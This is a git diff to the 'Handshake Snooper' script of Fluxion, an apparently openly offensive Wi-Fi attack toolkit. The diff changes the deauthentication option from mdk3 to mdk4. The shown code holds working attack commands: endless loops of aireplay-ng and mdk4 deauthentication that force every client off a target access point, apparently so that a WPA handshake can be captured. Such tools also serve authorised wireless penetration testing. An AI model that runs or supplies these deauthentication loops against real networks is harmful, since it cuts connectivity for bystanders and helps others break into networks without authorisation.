diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 218b430..7822cc6 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -168,8 +168,8 @@ handshake_snooper_start_deauthenticator() { # Prepare deauthenticators case "$HandshakeSnooperDeauthenticatorIdentifier" in - "$HandshakeSnooperMdk3MethodOption") - echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; + "$HandshakeSnooperMdk4MethodOption") + echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk4_blacklist.lst ;; esac # Start deauthenticators. @@ -180,10 +180,10 @@ handshake_snooper_start_deauthenticator() { "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" & HandshakeSnooperDeauthenticatorPID=$! ;; - "$HandshakeSnooperMdk3MethodOption") + "$HandshakeSnooperMdk4MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ - "while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" & + "while true; do sleep 7; timeout 3 mdk4 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk4_blacklist.lst -c $FluxionTargetChannel; done" & HandshakeSnooperDeauthenticatorPID=$! ;; esac @@ -203,7 +203,7 @@ handshake_snooper_set_deauthenticator_identifier() { local methods=( "$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" - "$HandshakeSnooperMdk3MethodOption" + "$HandshakeSnooperMdk4MethodOption" "$FLUXIONGeneralBackOption" ) io_query_choice "$HandshakeSnooperMethodQuery" methods[@]